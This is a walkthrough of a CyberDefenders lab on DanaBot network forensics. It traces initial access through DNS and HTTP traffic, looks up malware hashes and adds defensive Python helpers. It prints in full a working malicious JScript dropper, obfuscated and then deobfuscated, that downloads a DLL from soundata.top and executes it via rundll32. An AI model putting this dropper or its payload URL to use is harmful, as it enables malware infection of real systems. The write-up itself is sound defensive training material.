Analyze network traffic using Wireshark to identify DanaBot initial access, deobfuscate malicious JavaScript, and extract IOCs like IPs, file hashes, and execution processes.


Introduction


Back to CyberDefenders yet again! A lot of my recent posts have been focused more on Threat Intel. Threat Intel is great to keep in the back of your mind as something you may need to do. Attribution is important if you’re a Threat Hunter/Researcher, but if you’re a SOC Analyst it’s not very likely that you’ll be collating every indicator from an alert - it’s much more likely that you’ll pick up an alert, investigate it, close it, and move on to the next five alerts that came into your SIEM in the time it took.

We’ll be going through the DanaBot Lab from CyberDefenders today. From the initial description we already know that we’ll be using Wireshark for this lab. It’s important to keep practicing tools as you learn. It’s pretty easy to find a course online that will teach you what Wireshark is, but knowing what it is and actually using it are very different. I’ve always found that getting hands-on practice with a tool is a lot better than reading a manual, so I’m excited to dive in!


The SOC team has detected suspicious activity in the network traffic, revealing that a machine has been compromised. Sensitive company information has been stolen. Your task is to use Network Capture (PCAP) files and Threat Intelligence to investigate the incident and determine how the breach occurred.

The scenario introduction gives us some nice background to the lab. From the above text we already know that an endpoint in the environment has been compromised and data has been exfiltrated. We’ll also be using Threat Intelligence later on, so I’m excited to continue!

Before we get started on any of the questions we need to download the lab files. We have just the one file - 205-DanaBot.pcap. Once we have this file downloaded we’re good to go!


Question one

Which IP address was used by the attacker during the initial access?


As per the first hint:

When investigating a security incident, DNS requests often reveal the first point of contact between the victim and attacker. Have you looked at the DNS traffic in the PCAP file?

After opening the .pcap in Wireshark we can apply the display filter dns. This is a very basic filter, but following the hint it will help us find the initial access point.

There are 144 packets displayed with this filter. 144 is still a lot of packets, and we can definitely filter this down further with additional filter queries. We’ll touch more on that later on, but for now I like to do a quick scan to see if anything jumps out as being suspicious.

The majority of the packets show DNS requests to legitimate domains: things like windows.com or microsoft.com and their various subdomains. If you’re not familiar with some of these domains, this is a good glimpse into how many queries Windows endpoints send out to Microsoft services. Phoning home to Windows/Microsoft is pretty common while Windows is chugging along in the background.

One of the DNS queries in the .pcap is for ipv6.msftconnecttest.com. If you’re not familiar with this domain, don’t freak out. A quick search turns up this Microsoft Learn question, and the answer does a pretty good job of explaining what this request is doing:

This happens because, when the operating system starts, tests are run to verify that everything works fine. Verification of Internet access is done with the intention of preventing downed processes that need to access the network.

Breaking down the hostname also points to this. The subdomain ipv6 suggests it’s IPv6-related, and the domain msftconnecttest.com breaks down into Microsoft (msft) connect test (connecttest.com). Putting that together, it makes sense that this is a Microsoft (and therefore Windows) connectivity test, specifically for IPv6.

We can disregard all these legitimate Microsoft/Windows domains. At a quick glance I saw a query for a domain that seemed off - Standard query 0xc889 A portfolio.serveirc.com.

The domain portfolio.serveirc.com doesn’t match any Microsoft/Windows domain that I know of. Looking into the IP address it resolves to gives us our answer.
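The triage done by eye above can also be scripted so the Microsoft background noise is dropped automatically. As an added example (not part of the original write-up), the Python below takes the tab-separated output of `tshark -r 205-DanaBot.pcap -Y "dns.flags.response == 1" -T fields -e frame.number -e dns.qry.name -e dns.a`, allowlists the domains the post treats as normal Windows traffic, and lists what is left; the sample lines and the RFC 5737 addresses are constructed, and only portfolio.serveirc.com and 62.173.142.148 come from the lab.

```python
from collections import Counter

# Domains the write-up treats as normal Windows background chatter (analyst allowlist, extend as needed).
ALLOWLIST = {"microsoft.com", "windows.com", "msftconnecttest.com"}

# Constructed sample of `tshark ... -T fields -e frame.number -e dns.qry.name -e dns.a` output.
# Frame numbers and the 192.0.2.x / 198.51.100.x addresses are made up; portfolio.serveirc.com
# and 62.173.142.148 are the indicators discussed in the lab write-up.
SAMPLE_DNS = """\
12\tipv6.msftconnecttest.com\t
15\tsettings-win.data.microsoft.com\t192.0.2.10
31\twww.windows.com\t192.0.2.11,192.0.2.12
40\tportfolio.serveirc.com\t62.173.142.148
58\tmicrosoft.com.example.net\t198.51.100.7
"""

def is_allowlisted(name, allowlist=ALLOWLIST):
    """True if name equals or is a subdomain of an allowlisted domain.
    Matching is done on label boundaries, so notmicrosoft.com and
    microsoft.com.example.net are NOT treated as Microsoft."""
    labels = name.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in allowlist for i in range(len(labels)))

def parse_tshark_fields(text):
    """Yield (frame, query_name, [answer IPs]) from tab-separated tshark output."""
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t") + ["", ""]          # pad lines with missing fields
        frame, qname, answers = fields[0], fields[1], fields[2]
        # dns.a is comma-separated when one response carries several A records
        yield int(frame), qname, [ip for ip in answers.split(",") if ip]

def triage(text, allowlist=ALLOWLIST):
    """Return (query count per name, non-allowlisted (frame, name, ips) in pcap order)."""
    counts = Counter()
    suspicious = []
    for frame, qname, ips in parse_tshark_fields(text):
        counts[qname] += 1
        if not is_allowlisted(qname, allowlist):
            suspicious.append((frame, qname, ips))
    return counts, suspicious

if __name__ == "__main__":
    counts, suspicious = triage(SAMPLE_DNS)
    print(f"{sum(counts.values())} DNS responses, {len(suspicious)} outside the allowlist:")
    for frame, qname, ips in suspicious:
        print(f"  frame {frame}: {qname} -> {', '.join(ips) or '(no A record)'}")
```

On the real capture the allowlist will need a few more Microsoft domains, but the point is that the one odd query stands out once the telemetry hosts are filtered on a proper label boundary.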


Question two

What is the name of the malicious file used for initial access?


We know the IP address (and the domain name) associated with the infostealer, so let’s find what happened after the initial dns query.

From the wording of the question we know that a file was downloaded at some point. With the malicious IP address known, we can filter for packets where that IP is the source and where a file was downloaded. ip.src == 62.173.142.148 was the filter I ultimately went with. It’s very basic, and in a much larger .pcap file we would likely need to filter this down further, but for this lab it does the job.

There is only one HTTP packet that matches this filter; the rest are TCP. Looking at the details of this packet we can see Content-disposition: attachment;filename=allegato_708.js, which gives us the name of the file that was downloaded when the login.php page was visited.


Question three

What is the SHA-256 hash of the malicious file used for initial access?


To get this answer we’ll need to get our hands on the file. My ISP has actually blocked me from accessing the URL which is nice for average end-users, but for someone doing network analysis on a malware sample it’s a bit annoying.

Thankfully this is a known malware sample. I tried to pull the hash via a few means, like copying the content of the JavaScript into an empty file and running sha256sum over it. Unsurprisingly this didn’t work, since any difference in whitespace or encoding from the original file changes the hash. Here’s the JavaScript; bear in mind that this is malicious:

function _0x23c2(){var _0xac67d2=['a8k3odVdVaBcHh/dUmoMWRBdK8kS','W6XeW43cPJWvWQ/cGhykW5FcQ3O','WOa1eupdOSkXWROVjCoMbLldTNq','WQWlk2mA','j8ocW6xcJ0hdNCoJW4RcPsRdVmo6kW','pmk+dmk5W6qEW67dOMi','ECo8WPZdNmojb37dQSoLe8kIja','tmopD8k7W7a1W4VdSLeMuCoNWP1VW5pcVgehWPzkB3hdKKSpnatdICkRoIxdT1O/W6Tzru3dMmoBmCkfW6xcNmkdW6ZdJ8oWCSklWQ/dVG','AcXXvd0E','W5hcUaxcQZFdG8khp13dMezGeG','gSkFWPRdN8kLrCkMdq','kSoWqSkCqmobWRhcGtCsjYm','WPKzWQCXWOhdTmo/','W6uSb8o4z8oHxbVcRfNdICou','W5JcIImOW57cRCoOhJO','jKJcOIerWOhcMaXtd01a','W69bW4pcOtWAWQNcRLm+W6tcQ2e','WQvGi8kdW59hjSkCsx3cRCkR','vCozW4/cRCkEWQRdS8onFsTaWPRcJCoru8o6','W7TtCJvFwHeFW53dSrjc','BXinydldQ8oeWQpdK15tW7pcVq','wCo0rmkA','WQVdH1zWwcldI8kmnNpdSCoUWO0','p2OrWOqWWRS','W7iWWQu2','g3K9WPC','WPS6amoPESo7','n2rUfXKj','lSkTamkgb8o2W7tcH8ktqSkAWOSIWQXnW6u','W6fVuXRcPSo3W4Wio8o4exJdSa','W6XdW4FcOtGAWQ7cRuCyW6RcMxC','W6qOaSoTxmoGArFcGLm','ASkXW5aoWQS','qmoEBmkYW7LbWQldOLuGuSo/WOrX','W6VcUv0vELW+WQ8yfCkbW4S','BSkGW4StWR7cRg1RzCo+WPjfeSoNW4LfF8k7mwrDiJVdTf7cQW','eSofqmkq','W6hcGmkYmLHeWRJdNfuiW4jrqCkVzmkHhmknWPz/W6pcNJ/dRSoSW4WSpNn2WPiGW5a','W7HEDdXCuxqpW6hdUqrWW5K','W4pdVrDzWPJcMmkvmZefcNS','W5/dJfJdUMZcT8o2','g0qgkvtdTG','AXWozJVdQ8kKWQNdQwPRW5m','ueNcGq','W4neW7ZcHLJdJ8kTBmkqW7HAt28','iSktWPxcO8k5y0WHsce','E8k3WQG+W5e','yCoKCMFcUeRdMxtdM8kDWRNdR8kzqmoPWQ87W5aAWR1woH7cRCoxW6S','gwbR','fhfLhG'];_0x23c2=function(){return _0xac67d2;};return _0x23c2();}var _0x10ab20=_0x57c2;(function(_0x562920,_0x324070){var _0x4c8674=_0x57c2,_0x538a6a=_0x562920();while(!![]){try{var _0x385777=parseInt(_0x4c8674(0x158,'XkeN'))/0x1+parseInt(_0x4c8674(0x12e,'[%Fm'))/0x2+-parseInt(_0x4c8674(0x142,'XkeN'))/0x3+parseInt(_0x4c8674(0x13e,'O%ju'))/0x4+-parseInt(_0x4c8674(0x14b,'xQOj'))/0x5+parseInt(_0x4c8674(0x133,'A4&G'))/0x6*(parseInt(_0x4c8674(0x150,'dK59'))/0x7)+-parseInt(_0x4c8674(0x156,'(Q&R'))/0x8*(parseInt(_0x4c8674(0x132,'OlYg'))/0x9);if(_0x385777===_0x324070)break;else 
_0x538a6a['push'](_0x538a6a['shift']());}catch(_0x2d274b){_0x538a6a['push'](_0x538a6a['shift']());}}}(_0x23c2,0x54a3a));function _0x414360(_0x5c5160){var _0x567e59=_0x57c2,_0x119065='',_0x4f008b=_0x567e59(0x135,'A4&G'),_0x5a393f=_0x4f008b[_0x567e59(0x149,'w@FV')];for(var _0x3d45b7=0x0;_0x3d45b7<_0x5c5160;_0x3d45b7++){_0x119065+=_0x4f008b[_0x567e59(0x157,'*rdb')](Math[_0x567e59(0x131,'sRMv')](Math[_0x567e59(0x145,'GKs8')]()*_0x5a393f));}return _0x119065+_0x567e59(0x147,'5%8N');}var _0x23d4f8=_0x10ab20(0x153,'%$(b'),_0x48a85a=_0x414360(0xa),_0x44bdd9=new ActiveXObject(_0x10ab20(0x151,'V6of'))[_0x10ab20(0x14a,'^5PL')](0x2)+'\x5c'+_0x48a85a,_0x5da57f=WScript[_0x10ab20(0x134,'oGec')](_0x10ab20(0x14f,'A4&G'));function _0x57c2(_0x11e4af,_0x54a6eb){var _0x23c29e=_0x23c2();return _0x57c2=function(_0x57c28d,_0x19268b){_0x57c28d=_0x57c28d-0x128;var _0x26c549=_0x23c29e[_0x57c28d];if(_0x57c2['VLfCmI']===undefined){var _0x9ab1c1=function(_0x49a20c){var _0x3b5c63='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0xcdecf3='',_0x16e53d='';for(var _0x39434a=0x0,_0x3cb912,_0x118fbd,_0x4e12df=0x0;_0x118fbd=_0x49a20c['charAt'](_0x4e12df++);~_0x118fbd&&(_0x3cb912=_0x39434a%0x4?_0x3cb912*0x40+_0x118fbd:_0x118fbd,_0x39434a++%0x4)?_0xcdecf3+=String['fromCharCode'](0xff&_0x3cb912>>(-0x2*_0x39434a&0x6)):0x0){_0x118fbd=_0x3b5c63['indexOf'](_0x118fbd);}for(var _0x42daf9=0x0,_0x4f2d07=_0xcdecf3['length'];_0x42daf9<_0x4f2d07;_0x42daf9++){_0x16e53d+='%'+('00'+_0xcdecf3['charCodeAt'](_0x42daf9)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x16e53d);};var _0x1be13e=function(_0x43cbd0,_0x5e5510){var _0x14b9a0=[],_0x24e5cd=0x0,_0x5c44af,_0x5c1992='';_0x43cbd0=_0x9ab1c1(_0x43cbd0);var 
_0x363895;for(_0x363895=0x0;_0x363895<0x100;_0x363895++){_0x14b9a0[_0x363895]=_0x363895;}for(_0x363895=0x0;_0x363895<0x100;_0x363895++){_0x24e5cd=(_0x24e5cd+_0x14b9a0[_0x363895]+_0x5e5510['charCodeAt'](_0x363895%_0x5e5510['length']))%0x100,_0x5c44af=_0x14b9a0[_0x363895],_0x14b9a0[_0x363895]=_0x14b9a0[_0x24e5cd],_0x14b9a0[_0x24e5cd]=_0x5c44af;}_0x363895=0x0,_0x24e5cd=0x0;for(var _0x46ed8b=0x0;_0x46ed8b<_0x43cbd0['length'];_0x46ed8b++){_0x363895=(_0x363895+0x1)%0x100,_0x24e5cd=(_0x24e5cd+_0x14b9a0[_0x363895])%0x100,_0x5c44af=_0x14b9a0[_0x363895],_0x14b9a0[_0x363895]=_0x14b9a0[_0x24e5cd],_0x14b9a0[_0x24e5cd]=_0x5c44af,_0x5c1992+=String['fromCharCode'](_0x43cbd0['charCodeAt'](_0x46ed8b)^_0x14b9a0[(_0x14b9a0[_0x363895]+_0x14b9a0[_0x24e5cd])%0x100]);}return _0x5c1992;};_0x57c2['Gcvrzi']=_0x1be13e,_0x11e4af=arguments,_0x57c2['VLfCmI']=!![];}var _0x178ebd=_0x23c29e[0x0],_0x14ddc7=_0x57c28d+_0x178ebd,_0x2a1ef9=_0x11e4af[_0x14ddc7];return!_0x2a1ef9?(_0x57c2['BCBEPx']===undefined&&(_0x57c2['BCBEPx']=!![]),_0x26c549=_0x57c2['Gcvrzi'](_0x26c549,_0x19268b),_0x11e4af[_0x14ddc7]=_0x26c549):_0x26c549=_0x2a1ef9,_0x26c549;},_0x57c2(_0x11e4af,_0x54a6eb);}_0x5da57f[_0x10ab20(0x12d,'w@FV')](_0x10ab20(0x12c,'XkeN'),_0x23d4f8,![]),_0x5da57f[_0x10ab20(0x146,'B[vm')]();if(_0x5da57f[_0x10ab20(0x136,'t2ew')]==0xc8){var _0x3c8952=WScript[_0x10ab20(0x139,'RdnH')](_0x10ab20(0x155,'6N7O'));_0x3c8952[_0x10ab20(0x152,'1GKJ')](),_0x3c8952[_0x10ab20(0x143,'A4&G')]=0x1,_0x3c8952[_0x10ab20(0x14e,'V6of')](_0x5da57f[_0x10ab20(0x13b,'h*Z]')]),_0x3c8952[_0x10ab20(0x138,'JDok')]=0x0,_0x3c8952[_0x10ab20(0x14d,'h*Z]')](_0x44bdd9,0x2),_0x3c8952[_0x10ab20(0x12a,'DYtC')]();var _0x1e16b0=WScript[_0x10ab20(0x13f,']o#z')](_0x10ab20(0x144,'o]7W'));_0x1e16b0[_0x10ab20(0x159,'^n!v')](_0x10ab20(0x140,'1^^k')+_0x44bdd9+_0x10ab20(0x148,'h*Z]'),0x0,!![]);}new ActiveXObject(_0x10ab20(0x12b,'[%Fm'))[_0x10ab20(0x129,'$$(i')](WScript[_0x10ab20(0x130,'xQOj')]);

The above JavaScript is heavily obfuscated, but we’ll touch more on it later on.

For now we’ll have to hope that the file has been analyzed on one of the many online sandboxes, and after a quick search we can find this any.run report on the allegato_708.js file, which contains the SHA256 hash.


Question four

Which process was used to execute the malicious file?


I’ve written about my annoyances with any.run before, so we’re actually going to change it up a bit and move to RecordedFuture’s tria.ge report for the file hash. In the tab for the JavaScript file we can see the Processes section, which gives us the execution parent of the malicious file.


Question five

What is the file extension of the second malicious file utilized by the attacker?


Time to go back to that obfuscated javascript!

There are a few different deobfuscators available online. When I pasted the JavaScript into one of them it actually suggested that I use deobfuscate.io’s decoder, which is nice.
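To see what such a decoder has to undo here: every string in the script above is fetched through _0x57c2(index, key), which rebases the index by 0x128, base64-decodes the table entry (the _0x9ab1c1 helper) and then RC4-decrypts it with the per-call key (the _0x1be13e helper). The Python below re-implements that lookup as an added example (not the sample’s or deobfuscate.io’s code); the table it decodes is constructed from strings the deobfuscated script uses, encrypted under keys that appear in the obfuscated call sites, and it skips the array-rotation loop the real sample runs first.

```python
import base64

def rc4(data: bytes, key: bytes) -> bytes:
    """Plain RC4, as implemented by the _0x1be13e helper in the obfuscated script."""
    S = list(range(256))                         # key scheduling: the first two 0x100 loops
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()                            # keystream generation + XOR: the final loop
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def decode_string(encoded: str, key: str) -> str:
    """One table entry -> cleartext: base64 (the _0x9ab1c1 helper), RC4 with the
    per-call key, then the percent-encode/decodeURIComponent step, i.e. UTF-8."""
    return rc4(base64.b64decode(encoded), key.encode()).decode("utf-8")

def encode_string(plain: str, key: str) -> str:
    """Inverse of decode_string; only used here to build the constructed table."""
    return base64.b64encode(rc4(plain.encode("utf-8"), key.encode())).decode("ascii")

def lookup(table, index: int, key: str) -> str:
    """_0x57c2(index, key): the index is rebased by 0x128 before indexing the table.
    In the real sample the IIFE first rotates the table until its checksum equals
    0x54a3a; this constructed table is already in its final order."""
    return decode_string(table[index - 0x128], key)

# Constructed table: strings the deobfuscated script uses, encrypted under keys taken
# from the obfuscated call sites. These are NOT the sample's real table entries.
_PLAIN = [("MSXML2.XMLHTTP", "XkeN"), ("GET", "[%Fm"), ("rundll32.exe /B ", "w@FV")]
TABLE = [encode_string(plain, key) for plain, key in _PLAIN]

if __name__ == "__main__":
    for i, (_, key) in enumerate(_PLAIN):
        print(hex(0x128 + i), repr(key), "->", lookup(TABLE, 0x128 + i, key))
```

Because each call site carries its own key, a decoder has to evaluate the lookup per call rather than decrypt the table once, which is why the automated tools replace the calls with the resulting literals.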

Here’s the deobfuscated JavaScript (remember, this is from a malware sample):

function _0x414360(_0x5c5160) {
  var _0x119065 = '';
  var _0x5a393f = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".length;
  for (var _0x3d45b7 = 0x0; _0x3d45b7 < _0x5c5160; _0x3d45b7++) {
    _0x119065 += "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".charAt(Math.floor(Math.random() * _0x5a393f));
  }
  return _0x119065 + ".dll";
}
var _0x48a85a = _0x414360(0xa);
var _0x44bdd9 = new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(0x2) + "\\" + _0x48a85a;
var _0x5da57f = WScript.CreateObject("MSXML2.XMLHTTP");
_0x5da57f.Open("GET", "http://soundata.top/resources.dll", false);
_0x5da57f.Send();
if (_0x5da57f.Status == 0xc8) {
  var _0x3c8952 = WScript.CreateObject("ADODB.Stream");
  _0x3c8952.Open();
  _0x3c8952.Type = 0x1;
  _0x3c8952.Write(_0x5da57f.ResponseBody);
  _0x3c8952.Position = 0x0;
  _0x3c8952.SaveToFile(_0x44bdd9, 0x2);
  _0x3c8952.Close();
  var _0x1e16b0 = WScript.CreateObject("Wscript.Shell");
  _0x1e16b0.Run("rundll32.exe /B " + _0x44bdd9 + ",start", 0x0, true);
}
new ActiveXObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptFullName);

The secondary payload can be seen in plaintext pretty clearly: the Open call fetches http://soundata.top/resources.dll, and the downloaded file is saved under a random name with the extension returned by the first function.
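From a detection standpoint, the last few lines of the deobfuscated script are the useful part: a DLL with a random 10-letter name is written to the temp folder and launched with rundll32.exe /B <path>,start. As an added example (not part of the original write-up), the Python below scores process command lines for that combination; the event lines are constructed, and the /B switch, the ,start entry point and the 10-letter name pattern come from the script above.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation command lines. The first one mirrors the dropper above:
# a 10-letter random DLL name in %TEMP%, launched via "rundll32.exe /B <dll>,start".
SAMPLE_CMDLINES = [
    r'rundll32.exe /B C:\Users\alice\AppData\Local\Temp\qWvXuRtSpL.dll,start',
    r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL hotplug.dll',
    r'"C:\Windows\System32\rundll32.exe" "C:\Program Files\Vendor\helper.dll",Init',
    r'notepad.exe C:\Users\alice\notes.txt',
]

RUNDLL32_RE = re.compile(r'^"?(?:.*\\)?rundll32(?:\.exe)?"?\s+(.*)$', re.IGNORECASE)
TEMP_MARKERS = ("\\temp\\", "\\tmp\\")

def parse_rundll32(cmdline):
    """Return (dll_path, entry_point) for a rundll32 command line, else None."""
    m = RUNDLL32_RE.match(cmdline.strip())
    if not m:
        return None
    args = m.group(1).strip()
    while args.startswith("/"):                 # skip leading switches such as the script's /B
        args = args.split(None, 1)[1] if " " in args else ""
    dll, _, entry = args.partition(",")
    return dll.strip().strip('"'), entry.strip()

def score(cmdline):
    """List the reasons a command line matches the dropper's rundll32 pattern ([] = no match)."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return []
    dll, entry = parsed
    reasons = []
    if any(marker in dll.lower() for marker in TEMP_MARKERS):
        reasons.append("DLL loaded from a temp directory")
    if re.fullmatch(r"[A-Za-z]{10}", PureWindowsPath(dll).stem):
        reasons.append("10-letter random-looking DLL name (the dropper's generator)")
    if entry.lower() == "start":
        reasons.append("entry point 'start'")
    return reasons

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        hits = score(line)
        print("ALERT" if len(hits) >= 2 else "ok   ", line)
        for reason in hits:
            print("      -", reason)
```

Any one of the three signals on its own is noisy (plenty of installers run DLLs from temp), so alert on the combination rather than on a single reason.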


Question six

What is the MD5 hash of the second malicious file?


We’ll hop over to URLhaus and search for the URL of that malicious .dll file. Unfortunately I ran into the same issue with my ISP blocking me from downloading the file outright, so we need to work around this a bit.

I found this report for the URL. Down in the Payload delivery section we can see the SHA256 hashes that URLhaus has retrieved from the URL. There are five hashes shown here, and unfortunately for us they are not displayed as MD5. We can still use the SHA256 hash though. We’ll start from the first hash shown and put this into what is quickly becoming one of my favorite TI sites, RecordedFuture’s Tria.ge.

I found this report, which matches the filename and the SHA256 hash and shows us the MD5 hash.


Conclusion


I was expecting a bit more Wireshark in this lab, if I’m being honest. The tools tagged on this lab are: Wireshark, VirusTotal, ANY.RUN, and Network Miner. I used the first three for sure, but I was expecting this to be a full Wireshark-only lab. I’ll be trying to target more Wireshark-specific labs in the future. So stay tuned!